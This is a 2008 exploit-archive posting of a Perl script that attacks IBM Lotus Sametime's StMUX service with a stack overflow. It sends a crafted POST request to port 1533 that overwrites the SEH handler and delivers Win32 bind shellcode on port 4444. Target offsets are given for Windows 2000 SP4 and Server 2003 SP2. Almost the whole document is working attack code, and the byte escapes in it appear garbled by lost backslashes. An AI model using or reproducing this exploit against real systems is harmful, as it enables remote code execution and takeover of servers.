sametime-exploit.txt
Posted on 22 May 2008
#!perl # # "IBM Lotus Sametime" StMUX Stack Overflow Exploit # # Author: Manuel Santamarina Suarez # e-Mail: FistFuXXer@gmx.de # use IO::Socket; use File::Basename; # # destination TCP port # $port = 1533; # # SE handler # # Don't use upper-case ASCII characters or 0x00, 0x0a, 0x0b, 0x0d, 0x20 # You MUST use a POP/POP/RET sequence that doesn't modify the ESP register # $seh = reverse( "x7Cx34x10xC2" ); # POP ECX/POP ECX/RET # msvcr71.7c3410c2 # universal # # Shellcode # # Win32 Bind Shellcode (EXITFUNC=process, LPORT=4444) # $sc = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45". "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49". "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d". "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66". "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61". "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40". "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32". "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6". "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09". "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0". "x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff". "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53". "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff". "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64". "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89". "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab". "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51". "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53". "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6". "x52xffxd0x68x7exd8xe2x73x53xffxd6xffxd0"; # # JUMP to 'ESP adjustment' and shellcode # $jmp = "x74x23". # JE SHORT "x75x21"; # JNZ SHORT # # # Don't edit anything after this line # # sub usage { print "Usage: " . basename( $0 ) . " [target] [IPv4 address] ". "Example: ". basename( $0 ) . " 1 192.168.1.32 ". " ". "Targets: ". "[1] Lotus Sametime 7.5 on Windows Server 2000 SP4 ". "[2] Lotus Sametime 7.5 on Windows Server 2003 SP2 "; exit; } # Net::IP::ip_is_ipv4 sub ip_is_ipv4 { my $ip = shift; if (length($ip) < 7) { return 0; } unless ($ip =~ m/^[d.]+$/) { return 0; } if ($ip =~ m/^./) { return 0; } if ($ip =~ m/.$/) { return 0; } if ($ip =~ m/^(d+)$/ and $1 < 256) { return 1 } my $n = ($ip =~ tr/././); unless ($n >= 0 and $n < 4) { return 0; } if ($ip =~ m/../) { return 0; } foreach (split /./, $ip) { unless ($_ >= 0 and $_ < 256) { return 0; } } return 1; } print "--------------------------------------------------- ". ' "IBM Lotus Sametime" StMUX Stack Overflow Exploit'." ". "--------------------------------------------------- "; if( ($#ARGV+1) != 2 ) { &usage; } # Windows 2000 SP4 if( $ARGV[0] == 1 ) { $popad = "x5b" x 3 . # POP EBX "x61" x 268 . # POPAD "xffx24x24"; # JMP DWORD PTR SS:[ESP] } # Windows 2003 SP2 elsif( $ARGV[0] == 2 ) { $popad = "x5b" x 3 . # POP EBX "x61" x 269 . # POPAD "xffx24x24"; # JMP DWORD PTR SS:[ESP] } else { &usage; } if( ip_is_ipv4( $ARGV[1] ) ) { $ip = $ARGV[1]; } else { &usage; } print "[+] Connecting to $ip:$port... "; $sock = IO::Socket::INET->new ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', Timeout => 2 ) or print "[-] Error: Couldn't establish a connection to $ip:$port! " and exit; print "[+] Connected. ". "[+] Trying to overwrite and control the SE handler... "; $path = "x66" x 44 . $jmp . $seh . "x66" x 29 . $popad; $sock->send ( "POST /CommunityCBR/CC.39.$path/ ". "User-Agent: Sametime Community Agent ". "Host: $ip:1533 ". "Content-Length: ". length( $sc ) ." ". "Connection: Close ". "Cache-Control: no-cache ". " ". $sc ); sleep( 3 ); close( $sock ); print "[+] Done. Now check for a bind shell on $ip:4444! ";
